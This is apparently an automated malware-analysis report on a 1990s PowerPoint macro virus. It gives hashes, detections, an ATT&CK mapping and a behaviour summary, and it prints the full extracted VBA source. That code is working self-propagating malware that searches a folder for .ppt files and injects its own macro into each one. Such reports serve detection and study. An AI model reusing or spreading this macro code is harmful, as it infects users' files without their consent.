Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3bc3caec7361d477…

MALICIOUS

Office (OLE)

Size: 26.0 KB
Created: 1998-12-09 10:33:06
Authoring application: Microsoft PowerPoint
First seen: 2012-06-14
MD5: 69fed3ee0db9b616e6514d7022b92966
SHA-1: d7a2248b14ca15db2c27e855e411c7bda538c08b
SHA-256: 3bc3caec7361d4776746fecb0227f2625ce6914692b4847af32e6c182087e110
Risk Score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

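The sample is a PowerPoint file containing VBA macros. A command button on Slide1 shows UserForm1, and the form's UserForm_Terminate handler carries the propagation logic: it uses Application.FileSearch to find .ppt files in 'C:\My Documents' and its subfolders, skips the current presentation and any path containing "~", opens each remaining file, and inserts the first 27 lines of its own code module into every UserForm component (VBComponent type 3) that does not already begin with the marker comment '<!--1nternal-->'. It then saves and closes the modified presentation. This behavior suggests self-propagating, worm-like functionality within the PowerPoint ecosystem. The ClamAV detection of 'Win.Trojan.PP97M-7' further supports its malicious nature.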

Heuristics 2

  • ClamAV: Win.Trojan.PP97M-7 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.PP97M-7
  • VBA macros detected (medium; OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1768 bytes
SHA-256: d8672b3dc6367bf7fa186bb235af77926552158924876be62b70da8016f80a63
Detection
ClamAV: Win.Trojan.PP97M-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{9FF9504E-8FB3-11D2-98E1-82B548C9866A}{9FF95040-8FB3-11D2-98E1-82B548C9866A}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
'<!--1nternal-->
'PPT.Attach v0.1 /1nternal
Private Sub UserForm_Terminate()
    On Error Resume Next
    Set Home = ActivePresentation
    Set fs = Application.FileSearch
    fs.NewSearch
    fs.LookIn = "C:\My Documents"
    fs.SearchSubFolders = True
    fs.FileName = "*.ppt"
    fs.Execute
    For i = 1 To fs.FoundFiles.Count
        If InStr(1, fs.FoundFiles(i), "~", 1) = 0 And fs.FoundFiles(i) <> Home.FullName Then
            Set PVict = Presentations.Open(fs.FoundFiles(i))
            For j = 1 To PVict.VBProject.VBcomponents.Count
                If PVict.VBProject.VBcomponents(j).Type = 3 Then
                    If PVict.VBProject.VBcomponents(j).Codemodule.Lines(1, 1) <> "'<!--1nternal-->" Then
                        PVict.VBProject.VBcomponents(j).Codemodule.InsertLines 1, Home.VBProject.VBcomponents(Name).Codemodule.Lines(1, 27)
                        PVict.Save
                    End If
                End If
            Next
            PVict.Close
        End If
    Next
    Set PVict = Nothing
End Sub

Attribute VB_Name = "Slide1"
Attribute VB_Base = "0{91493445-5A91-11CF-8700-00AA0060263B}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 1, 0, MSForms, CommandButton"
Private Sub CommandButton1_Click()
    UserForm1.Show
End Sub